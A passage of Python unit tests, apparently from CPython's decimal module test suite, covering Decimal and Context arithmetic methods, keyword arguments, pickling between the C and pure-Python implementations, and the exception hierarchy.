self.assertEqual(ans, 'NaN1287828') self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.compare_signal(8224, context=None)) self.assertEqual(ans, '-1') self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.logical_and(101, context=None)) self.assertEqual(ans, '101') self.assertRaises(InvalidOperation, x.logical_and, 123, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.logical_or(101, context=None)) self.assertEqual(ans, '111') self.assertRaises(InvalidOperation, x.logical_or, 123, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.logical_xor(101, context=None)) self.assertEqual(ans, '10') self.assertRaises(InvalidOperation, x.logical_xor, 
123, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.max(101, context=None)) self.assertEqual(ans, '111') self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.max_mag(101, context=None)) self.assertEqual(ans, '111') self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.min(101, context=None)) self.assertEqual(ans, '101') self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.min_mag(101, context=None)) self.assertEqual(ans, '101') self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.remainder_near(101, context=None)) self.assertEqual(ans, '10') self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.rotate(2, context=None)) self.assertEqual(ans, '11100') self.assertRaises(InvalidOperation, x.rotate, 101, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.scaleb(7, context=None)) self.assertEqual(ans, '1.11E+9') self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() ans = str(x.shift(2, context=None)) self.assertEqual(ans, '11100') self.assertRaises(InvalidOperation, x.shift, 10000, context=None) self.assertTrue(c.flags[InvalidOperation]) ##### Ternary functions c.clear_flags() ans = str(x.fma(2, 3, context=None)) self.assertEqual(ans, '225') self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None) self.assertTrue(c.flags[Overflow]) ##### Special cases c.rounding = ROUND_HALF_EVEN ans = str(Decimal('1.5').to_integral(rounding=None, context=None)) 
self.assertEqual(ans, '2') c.rounding = ROUND_DOWN ans = str(Decimal('1.5').to_integral(rounding=None, context=None)) self.assertEqual(ans, '1') ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None)) self.assertEqual(ans, '2') c.clear_flags() self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None) self.assertTrue(c.flags[InvalidOperation]) c.rounding = ROUND_HALF_EVEN ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None)) self.assertEqual(ans, '2') c.rounding = ROUND_DOWN ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None)) self.assertEqual(ans, '1') ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None)) self.assertEqual(ans, '2') c.clear_flags() self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None) self.assertTrue(c.flags[InvalidOperation]) c.rounding = ROUND_HALF_EVEN ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None)) self.assertEqual(ans, '2') c.rounding = ROUND_DOWN ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None)) self.assertEqual(ans, '1') ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None)) self.assertEqual(ans, '2') c.clear_flags() self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None) self.assertTrue(c.flags[InvalidOperation]) c.rounding = ROUND_UP ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None)) self.assertEqual(ans, '1.501') c.rounding = ROUND_DOWN ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None)) self.assertEqual(ans, '1.500') ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None)) self.assertEqual(ans, '1.501') c.clear_flags() self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None) self.assertTrue(c.flags[InvalidOperation]) with localcontext(Context()) as context: 
            # (continuation of the preceding test) Inside the outer
            # localcontext(Context()) block: configure the active context,
            # then check that localcontext(ctx=None) falls back to it.
            context.prec = 7
            context.Emax = 999
            context.Emin = -999

            with localcontext(ctx=None) as c:
                self.assertEqual(c.prec, 7)
                self.assertEqual(c.Emax, 999)
                self.assertEqual(c.Emin, -999)

    def test_conversions_from_int(self):
        # Check that methods taking a second Decimal argument will
        # always accept an integer in place of a Decimal.
        Decimal = self.decimal.Decimal

        self.assertEqual(Decimal(4).compare(3),
                         Decimal(4).compare(Decimal(3)))
        self.assertEqual(Decimal(4).compare_signal(3),
                         Decimal(4).compare_signal(Decimal(3)))
        self.assertEqual(Decimal(4).compare_total(3),
                         Decimal(4).compare_total(Decimal(3)))
        self.assertEqual(Decimal(4).compare_total_mag(3),
                         Decimal(4).compare_total_mag(Decimal(3)))
        self.assertEqual(Decimal(10101).logical_and(1001),
                         Decimal(10101).logical_and(Decimal(1001)))
        self.assertEqual(Decimal(10101).logical_or(1001),
                         Decimal(10101).logical_or(Decimal(1001)))
        self.assertEqual(Decimal(10101).logical_xor(1001),
                         Decimal(10101).logical_xor(Decimal(1001)))
        self.assertEqual(Decimal(567).max(123),
                         Decimal(567).max(Decimal(123)))
        self.assertEqual(Decimal(567).max_mag(123),
                         Decimal(567).max_mag(Decimal(123)))
        self.assertEqual(Decimal(567).min(123),
                         Decimal(567).min(Decimal(123)))
        self.assertEqual(Decimal(567).min_mag(123),
                         Decimal(567).min_mag(Decimal(123)))
        self.assertEqual(Decimal(567).next_toward(123),
                         Decimal(567).next_toward(Decimal(123)))
        self.assertEqual(Decimal(1234).quantize(100),
                         Decimal(1234).quantize(Decimal(100)))
        self.assertEqual(Decimal(768).remainder_near(1234),
                         Decimal(768).remainder_near(Decimal(1234)))
        self.assertEqual(Decimal(123).rotate(1),
                         Decimal(123).rotate(Decimal(1)))
        self.assertEqual(Decimal(1234).same_quantum(1000),
                         Decimal(1234).same_quantum(Decimal(1000)))
        self.assertEqual(Decimal('9.123').scaleb(-100),
                         Decimal('9.123').scaleb(Decimal(-100)))
        self.assertEqual(Decimal(456).shift(-1),
                         Decimal(456).shift(Decimal(-1)))
        # fma is ternary: every mix of int/Decimal in the two extra
        # operands must produce the same result.
        self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
                         Decimal(-12).fma(Decimal(45), Decimal(67)))
        self.assertEqual(Decimal(-12).fma(45, 67),
                         Decimal(-12).fma(Decimal(45), Decimal(67)))
        self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
                         Decimal(-12).fma(Decimal(45), Decimal(67)))


# Run the usability suite against both implementations of the module.
class CUsabilityTest(UsabilityTest):
    decimal = C

class PyUsabilityTest(UsabilityTest):
    decimal = P


class PythonAPItests(unittest.TestCase):
    # Python-level API behavior shared by the C (_decimal) and pure-Python
    # implementations; `self.decimal` is bound by the subclasses below.

    def test_abc(self):
        # Decimal registers as a Number but deliberately not as a Real.
        Decimal = self.decimal.Decimal
        self.assertTrue(issubclass(Decimal, numbers.Number))
        self.assertFalse(issubclass(Decimal, numbers.Real))
        self.assertIsInstance(Decimal(0), numbers.Number)
        self.assertNotIsInstance(Decimal(0), numbers.Real)

    def test_pickle(self):
        # Round-trip Decimal through every pickle protocol, and check that
        # pickles are interchangeable between the C and Python modules
        # (selected by swapping sys.modules['decimal'] during dumps/loads).
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            Decimal = self.decimal.Decimal

            savedecimal = sys.modules['decimal']

            # Round trip
            sys.modules['decimal'] = self.decimal
            d = Decimal('-3.141590000')
            p = pickle.dumps(d, proto)
            e = pickle.loads(p)
            self.assertEqual(d, e)

            if C:
                # Test interchangeability
                x = C.Decimal('-3.123e81723')
                y = P.Decimal('-3.123e81723')

                sys.modules['decimal'] = C
                sx = pickle.dumps(x, proto)
                sys.modules['decimal'] = P
                r = pickle.loads(sx)
                self.assertIsInstance(r, P.Decimal)
                self.assertEqual(r, y)

                sys.modules['decimal'] = P
                sy = pickle.dumps(y, proto)
                sys.modules['decimal'] = C
                r = pickle.loads(sy)
                self.assertIsInstance(r, C.Decimal)
                self.assertEqual(r, x)

                # Same interchangeability for the as_tuple() named tuple.
                x = C.Decimal('-3.123e81723').as_tuple()
                y = P.Decimal('-3.123e81723').as_tuple()

                sys.modules['decimal'] = C
                sx = pickle.dumps(x, proto)
                sys.modules['decimal'] = P
                r = pickle.loads(sx)
                self.assertIsInstance(r, P.DecimalTuple)
                self.assertEqual(r, y)

                sys.modules['decimal'] = P
                sy = pickle.dumps(y, proto)
                sys.modules['decimal'] = C
                r = pickle.loads(sy)
                self.assertIsInstance(r, C.DecimalTuple)
                self.assertEqual(r, x)

            sys.modules['decimal'] = savedecimal

    def test_int(self):
        # int(Decimal) truncates toward zero, like int(float) and
        # to_integral(ROUND_DOWN); NaNs raise ValueError, infinities
        # raise OverflowError.
        Decimal = self.decimal.Decimal

        for x in range(-250, 250):
            s = '%0.2f' % (x / 100.0)
            # should work the same as for floats
            self.assertEqual(int(Decimal(s)), int(float(s)))
            # should work the same as to_integral in the ROUND_DOWN mode
            d = Decimal(s)
            r = d.to_integral(ROUND_DOWN)
            self.assertEqual(Decimal(int(d)), r)

        self.assertRaises(ValueError, int, Decimal('-nan'))
        self.assertRaises(ValueError, int, Decimal('snan'))
        self.assertRaises(OverflowError, int, Decimal('inf'))
        self.assertRaises(OverflowError, int, Decimal('-inf'))

    def test_trunc(self):
        # math.trunc mirrors int(): truncation toward zero.
        Decimal = self.decimal.Decimal

        for x in range(-250, 250):
            s = '%0.2f' % (x / 100.0)
            # should work the same as for floats
            self.assertEqual(int(Decimal(s)), int(float(s)))
            # should work the same as to_integral in the ROUND_DOWN mode
            d = Decimal(s)
            r = d.to_integral(ROUND_DOWN)
            self.assertEqual(Decimal(math.trunc(d)), r)

    def test_from_float(self):
        # from_float is a classmethod: it must return instances of the
        # subclass it is called on, convert floats exactly, and reject
        # non-numbers with TypeError.
        Decimal = self.decimal.Decimal

        class MyDecimal(Decimal):
            def __init__(self, _):
                self.x = 'y'

        self.assertTrue(issubclass(MyDecimal, Decimal))

        r = MyDecimal.from_float(0.1)
        self.assertEqual(type(r), MyDecimal)
        self.assertEqual(str(r),
                '0.1000000000000000055511151231257827021181583404541015625')
        self.assertEqual(r.x, 'y')

        bigint = 12345678901234567890123456789
        self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
        self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
        self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
        self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
        self.assertEqual(str(MyDecimal.from_float(float('nan'))),
                         str(Decimal('NaN')))
        self.assertEqual(str(MyDecimal.from_float(float('inf'))),
                         str(Decimal('Infinity')))
        self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
                         str(Decimal('-Infinity')))
        self.assertRaises(TypeError, MyDecimal.from_float, 'abc')

        for i in range(200):
            x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
            self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip

    def test_create_decimal_from_float(self):
        # Unlike from_float, the Context method rounds to the context
        # precision and honors the context traps (Inexact here).
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact

        context = Context(prec=5, rounding=ROUND_DOWN)
        self.assertEqual(
            context.create_decimal_from_float(math.pi),
            Decimal('3.1415')
        )
        context = Context(prec=5, rounding=ROUND_UP)
        self.assertEqual(
            context.create_decimal_from_float(math.pi),
            Decimal('3.1416')
        )
        context = Context(prec=5, traps=[Inexact])
        self.assertRaises(
            Inexact,
            context.create_decimal_from_float,
            math.pi
        )
        self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
                         "Decimal('-0')")
        self.assertEqual(repr(context.create_decimal_from_float(1.0)),
                         "Decimal('1')")
        self.assertEqual(repr(context.create_decimal_from_float(10)),
                         "Decimal('10')")

    def test_quantize(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        InvalidOperation = self.decimal.InvalidOperation

        c = Context(Emax=99999, Emin=-99999)
        self.assertEqual(
            Decimal('7.335').quantize(Decimal('.01')),
            Decimal('7.34')
        )
        self.assertEqual(
            Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
            Decimal('7.33')
        )
        # Exponent out of the context's range must signal InvalidOperation.
        self.assertRaises(
            InvalidOperation,
            Decimal("10e99999").quantize, Decimal('1e100000'),
            context=c
        )

        c = Context()
        d = Decimal("0.871831e800")
        # quantize accepts its arguments as keywords, in any order.
        x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
        self.assertEqual(x, Decimal('8.71E+799'))

    def test_complex(self):
        # Decimal supports the read-only complex protocol; the attributes
        # cannot be assigned.
        Decimal = self.decimal.Decimal

        x = Decimal("9.8182731e181273")
        self.assertEqual(x.real, x)
        self.assertEqual(x.imag, 0)
        self.assertEqual(x.conjugate(), x)

        x = Decimal("1")
        self.assertEqual(complex(x), complex(float(1)))

        self.assertRaises(AttributeError, setattr, x, 'real', 100)
        self.assertRaises(AttributeError, setattr, x, 'imag', 100)
        self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
        self.assertRaises(AttributeError, setattr, x, '__complex__', 100)

    def test_named_parameters(self):
        # Every Decimal method must accept `context=` (and its other
        # operands) by keyword; an explicit context must collect flags
        # itself and never leak them into the thread-local context `c`.
        D = self.decimal.Decimal
        Context = self.decimal.Context
        localcontext = self.decimal.localcontext
        InvalidOperation = self.decimal.InvalidOperation
        Overflow = self.decimal.Overflow

        xc = Context()
        xc.prec = 1
        xc.Emax = 1
        xc.Emin = -1

        with localcontext() as c:
            c.clear_flags()

            self.assertEqual(D(9, xc), 9)
            self.assertEqual(D(9, context=xc), 9)
            self.assertEqual(D(context=xc, value=9), 9)
            self.assertEqual(D(context=xc), 0)
            xc.clear_flags()
            self.assertRaises(InvalidOperation, D, "xyz", context=xc)
            self.assertTrue(xc.flags[InvalidOperation])
            self.assertFalse(c.flags[InvalidOperation])

            xc.clear_flags()
            self.assertEqual(D(2).exp(context=xc), 7)
            self.assertRaises(Overflow, D(8).exp, context=xc)
            self.assertTrue(xc.flags[Overflow])
            self.assertFalse(c.flags[Overflow])

            xc.clear_flags()
            self.assertEqual(D(2).ln(context=xc), D('0.7'))
            self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
            self.assertTrue(xc.flags[InvalidOperation])
            self.assertFalse(c.flags[InvalidOperation])

            self.assertEqual(D(0).log10(context=xc), D('-inf'))
            self.assertEqual(D(-1).next_minus(context=xc), -2)
            self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
            self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
            self.assertEqual(D("9999").to_integral(context=xc), 9999)
            self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
            self.assertEqual(D("123").to_integral_value(context=xc), 123)
            self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))

            self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
            xc.clear_flags()
            self.assertRaises(InvalidOperation,
                              D("0").compare_signal, D('nan'), context=xc)
            self.assertTrue(xc.flags[InvalidOperation])
            self.assertFalse(c.flags[InvalidOperation])
            # NOTE(review): the next assertion appears twice; looks like a
            # copy-paste duplicate — harmless, but worth confirming upstream.
            self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
            self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
            self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
                             D('-0.3'))
            self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
            self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
                             D('0.0'))
            self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
            xc.clear_flags()
            self.assertRaises(InvalidOperation,
                              D("0.2").quantize, D('1e10'), context=xc)
            self.assertTrue(xc.flags[InvalidOperation])
            self.assertFalse(c.flags[InvalidOperation])
            self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
                             D('-0.5'))

            self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
                             D('7E+1'))

            # Predicates that take no context must reject a context kwarg.
            self.assertRaises(TypeError, D(1).is_canonical, context=xc)
            self.assertRaises(TypeError, D(1).is_finite, context=xc)
            self.assertRaises(TypeError, D(1).is_infinite, context=xc)
            self.assertRaises(TypeError, D(1).is_nan, context=xc)
            self.assertRaises(TypeError, D(1).is_qnan, context=xc)
            self.assertRaises(TypeError, D(1).is_snan, context=xc)
            self.assertRaises(TypeError, D(1).is_signed, context=xc)
            self.assertRaises(TypeError, D(1).is_zero, context=xc)

            self.assertFalse(D("0.01").is_normal(context=xc))
            self.assertTrue(D("0.01").is_subnormal(context=xc))

            self.assertRaises(TypeError, D(1).adjusted, context=xc)
            self.assertRaises(TypeError, D(1).conjugate, context=xc)
            self.assertRaises(TypeError, D(1).radix, context=xc)

            self.assertEqual(D(-111).logb(context=xc), 2)
            self.assertEqual(D(0).logical_invert(context=xc), 1)
            self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
            self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')

            self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
            self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
            self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
            # NOTE(review): duplicated assertion below — presumably
            # copy-paste; confirm against upstream test_decimal.
            self.assertEqual(D('23').rotate(1, context=xc), 3)
            self.assertEqual(D('23').rotate(1, context=xc), 3)
            xc.clear_flags()
            self.assertRaises(Overflow,
                              D('23').scaleb, 1, context=xc)
            self.assertTrue(xc.flags[Overflow])
            self.assertFalse(c.flags[Overflow])
            self.assertEqual(D('23').shift(-1, context=xc), 0)

            self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
            self.assertRaises(TypeError, D(0).as_tuple, context=xc)

            self.assertEqual(D(1).canonical(), 1)
            self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
            self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
            self.assertRaises(TypeError, D(1).canonical, context="x")
            self.assertRaises(TypeError, D(1).canonical, xyz="x")

    def test_exception_hierarchy(self):
        # The signal classes must keep the documented inheritance lattice,
        # including the dual ArithmeticError/TypeError/ZeroDivisionError
        # bases used for builtin-exception compatibility.
        decimal = self.decimal
        DecimalException = decimal.DecimalException
        InvalidOperation = decimal.InvalidOperation
        FloatOperation = decimal.FloatOperation
        DivisionByZero = decimal.DivisionByZero
        Overflow = decimal.Overflow
        Underflow = decimal.Underflow
        Subnormal = decimal.Subnormal
        Inexact = decimal.Inexact
        Rounded = decimal.Rounded
        Clamped = decimal.Clamped

        self.assertTrue(issubclass(DecimalException, ArithmeticError))

        self.assertTrue(issubclass(InvalidOperation, DecimalException))
        self.assertTrue(issubclass(FloatOperation, DecimalException))
        self.assertTrue(issubclass(FloatOperation, TypeError))
        self.assertTrue(issubclass(DivisionByZero, DecimalException))
        self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
        self.assertTrue(issubclass(Overflow, Rounded))
        self.assertTrue(issubclass(Overflow, Inexact))
        self.assertTrue(issubclass(Overflow, DecimalException))
        self.assertTrue(issubclass(Underflow, Inexact))
        self.assertTrue(issubclass(Underflow, Rounded))
        self.assertTrue(issubclass(Underflow, Subnormal))
        self.assertTrue(issubclass(Underflow, DecimalException))
        self.assertTrue(issubclass(Subnormal, DecimalException))
        self.assertTrue(issubclass(Inexact, DecimalException))
        self.assertTrue(issubclass(Rounded, DecimalException))
        self.assertTrue(issubclass(Clamped, DecimalException))

        self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
        self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
        self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
        self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
        self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))


# Run the Python-API suite against both implementations of the module.
class CPythonAPItests(PythonAPItests):
    decimal = C

class PyPythonAPItests(PythonAPItests):
    decimal = P


class ContextAPItests(unittest.TestCase):
    # Context method behavior shared by both implementations; the general
    # contract exercised below: Context methods accept ints wherever they
    # accept Decimals, and raise TypeError for strings.

    def test_none_args(self):
        # Passing None for every constructor argument must be equivalent
        # to the documented defaults.
        Context = self.decimal.Context
        InvalidOperation = self.decimal.InvalidOperation
        DivisionByZero = self.decimal.DivisionByZero
        Overflow = self.decimal.Overflow

        c1 = Context()
        c2 = Context(prec=None,
                     rounding=None, Emax=None, Emin=None,
                     capitals=None, clamp=None, flags=None, traps=None)
        for c in [c1, c2]:
            self.assertEqual(c.prec, 28)
            self.assertEqual(c.rounding, ROUND_HALF_EVEN)
            self.assertEqual(c.Emax, 999999)
            self.assertEqual(c.Emin, -999999)
            self.assertEqual(c.capitals, 1)
            self.assertEqual(c.clamp, 0)
            assert_signals(self, c, 'flags', [])
            assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
                                              Overflow])

    @cpython_only
    def test_from_legacy_strings(self):
        # Legacy (non-compact) unicode strings must still work as rounding
        # names, but embedded NULs / empty strings are rejected.
        import _testcapi
        c = self.decimal.Context()

        for rnd in RoundingModes:
            c.rounding = _testcapi.unicode_legacy_string(rnd)
            self.assertEqual(c.rounding, rnd)

        s = _testcapi.unicode_legacy_string('')
        self.assertRaises(TypeError, setattr, c, 'rounding', s)

        s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
        self.assertRaises(TypeError, setattr, c, 'rounding', s)

    def test_pickle(self):
        # Contexts round-trip through every pickle protocol, and pickles
        # made by one implementation load in the other (randomized
        # attribute combinations; flags/traps are prefix slices of the
        # ordered signal list so both sides agree on contents).
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            Context = self.decimal.Context

            savedecimal = sys.modules['decimal']

            # Round trip
            sys.modules['decimal'] = self.decimal
            c = Context()
            e = pickle.loads(pickle.dumps(c, proto))

            self.assertEqual(c.prec, e.prec)
            self.assertEqual(c.Emin, e.Emin)
            self.assertEqual(c.Emax, e.Emax)
            self.assertEqual(c.rounding, e.rounding)
            self.assertEqual(c.capitals, e.capitals)
            self.assertEqual(c.clamp, e.clamp)
            self.assertEqual(c.flags, e.flags)
            self.assertEqual(c.traps, e.traps)

            # Test interchangeability
            combinations = [(C, P), (P, C)] if C else [(P, P)]
            for dumper, loader in combinations:
                for ri, _ in enumerate(RoundingModes):
                    for fi, _ in enumerate(OrderedSignals[dumper]):
                        for ti, _ in enumerate(OrderedSignals[dumper]):

                            prec = random.randrange(1, 100)
                            emin = random.randrange(-100, 0)
                            emax = random.randrange(1, 100)
                            caps = random.randrange(2)
                            clamp = random.randrange(2)

                            # One module dumps
                            sys.modules['decimal'] = dumper
                            c = dumper.Context(
                                prec=prec, Emin=emin, Emax=emax,
                                rounding=RoundingModes[ri],
                                capitals=caps, clamp=clamp,
                                flags=OrderedSignals[dumper][:fi],
                                traps=OrderedSignals[dumper][:ti]
                            )
                            s = pickle.dumps(c, proto)

                            # The other module loads
                            sys.modules['decimal'] = loader
                            d = pickle.loads(s)
                            self.assertIsInstance(d, loader.Context)

                            self.assertEqual(d.prec, prec)
                            self.assertEqual(d.Emin, emin)
                            self.assertEqual(d.Emax, emax)
                            self.assertEqual(d.rounding, RoundingModes[ri])
                            self.assertEqual(d.capitals, caps)
                            self.assertEqual(d.clamp, clamp)
                            assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
                            assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])

            sys.modules['decimal'] = savedecimal

    def test_equality_with_other_types(self):
        Decimal = self.decimal.Decimal
        self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
        self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])

    def test_copy(self):
        # All copies should be deep
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context

        c = Context()
        d = c.copy()
        self.assertNotEqual(id(c), id(d))
        self.assertNotEqual(id(c.flags), id(d.flags))
        self.assertNotEqual(id(c.traps), id(d.traps))
        k1 = set(c.flags.keys())
        k2 = set(d.flags.keys())
        self.assertEqual(k1, k2)
        self.assertEqual(c.flags, d.flags)

    def test__clamp(self):
        # In Python 3.2, the private attribute `_clamp` was made
        # public (issue 8540), with the old `_clamp` becoming a
        # property wrapping `clamp`.  For the duration of Python 3.2
        # only, the attribute should be gettable/settable via both
        # `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
        # removed.
        Context = self.decimal.Context
        c = Context()
        self.assertRaises(AttributeError, getattr, c, '_clamp')

    def test_abs(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.abs(Decimal(-1))
        self.assertEqual(c.abs(-1), d)
        self.assertRaises(TypeError, c.abs, '-1')

    def test_add(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.add(Decimal(1), Decimal(1))
        self.assertEqual(c.add(1, 1), d)
        self.assertEqual(c.add(Decimal(1), 1), d)
        self.assertEqual(c.add(1, Decimal(1)), d)
        self.assertRaises(TypeError, c.add, '1', 1)
        self.assertRaises(TypeError, c.add, 1, '1')

    def test_compare(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.compare(Decimal(1), Decimal(1))
        self.assertEqual(c.compare(1, 1), d)
        self.assertEqual(c.compare(Decimal(1), 1), d)
        self.assertEqual(c.compare(1, Decimal(1)), d)
        self.assertRaises(TypeError, c.compare, '1', 1)
        self.assertRaises(TypeError, c.compare, 1, '1')

    def test_compare_signal(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.compare_signal(Decimal(1), Decimal(1))
        self.assertEqual(c.compare_signal(1, 1), d)
        self.assertEqual(c.compare_signal(Decimal(1), 1), d)
        self.assertEqual(c.compare_signal(1, Decimal(1)), d)
        self.assertRaises(TypeError, c.compare_signal, '1', 1)
        self.assertRaises(TypeError, c.compare_signal, 1, '1')

    def test_compare_total(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.compare_total(Decimal(1), Decimal(1))
        self.assertEqual(c.compare_total(1, 1), d)
        self.assertEqual(c.compare_total(Decimal(1), 1), d)
        self.assertEqual(c.compare_total(1, Decimal(1)), d)
        self.assertRaises(TypeError, c.compare_total, '1', 1)
        self.assertRaises(TypeError, c.compare_total, 1, '1')

    def test_compare_total_mag(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.compare_total_mag(Decimal(1), Decimal(1))
        self.assertEqual(c.compare_total_mag(1, 1), d)
        self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
        self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
        self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
        self.assertRaises(TypeError, c.compare_total_mag, 1, '1')

    def test_copy_abs(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.copy_abs(Decimal(-1))
        self.assertEqual(c.copy_abs(-1), d)
        self.assertRaises(TypeError, c.copy_abs, '-1')

    def test_copy_decimal(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.copy_decimal(Decimal(-1))
        self.assertEqual(c.copy_decimal(-1), d)
        self.assertRaises(TypeError, c.copy_decimal, '-1')

    def test_copy_negate(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.copy_negate(Decimal(-1))
        self.assertEqual(c.copy_negate(-1), d)
        self.assertRaises(TypeError, c.copy_negate, '-1')

    def test_copy_sign(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.copy_sign(Decimal(1), Decimal(-2))
        self.assertEqual(c.copy_sign(1, -2), d)
        self.assertEqual(c.copy_sign(Decimal(1), -2), d)
        self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
        self.assertRaises(TypeError, c.copy_sign, '1', -2)
        self.assertRaises(TypeError, c.copy_sign, 1, '-2')

    def test_divide(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.divide(Decimal(1), Decimal(2))
        self.assertEqual(c.divide(1, 2), d)
        self.assertEqual(c.divide(Decimal(1), 2), d)
        self.assertEqual(c.divide(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.divide, '1', 2)
        self.assertRaises(TypeError, c.divide, 1, '2')

    def test_divide_int(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.divide_int(Decimal(1), Decimal(2))
        self.assertEqual(c.divide_int(1, 2), d)
        self.assertEqual(c.divide_int(Decimal(1), 2), d)
        self.assertEqual(c.divide_int(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.divide_int, '1', 2)
        self.assertRaises(TypeError, c.divide_int, 1, '2')

    def test_divmod(self):
